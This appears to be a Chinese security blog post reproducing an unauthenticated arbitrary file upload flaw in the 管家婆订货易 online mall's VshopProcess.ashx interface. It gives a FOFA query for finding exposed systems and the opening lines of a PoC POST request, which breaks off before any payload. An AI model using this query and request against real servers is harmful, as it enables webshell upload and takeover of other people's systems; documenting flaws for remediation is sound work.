管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现

0xSecl

已于 2024-03-04 23:06:10 修改

阅读量1.2k

点赞数 5

CC 4.0 BY-SA版权

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2024-03-04 23:05:58 首次发布

996 篇文章 ¥9.90 ¥99.00

订阅专栏

本文介绍了管家婆订货易在线商城存在的一个安全漏洞，详细阐述了漏洞概述、复现环境及过程，并给出了修复建议。攻击者能通过未授权的文件上传接口，可能导致代码执行和服务器被控制。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

管家婆订货易，帮助传统企业构建专属的订货平台，PC+微信+APP+小程序+h5商城5网合一，无缝对接线下的管家婆ERP系统，让用户订货更高效。支持业务员代客下单，支持多级推客分销，以客带客，拓展渠道。让企业的生意更轻松。

管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞，未经身份认证的攻击者可以通过该漏洞，上传恶意后门文件，深入利用可造成代码执行和服务器失陷。

FOFA：

title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"

PoC

POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.3

了解本专栏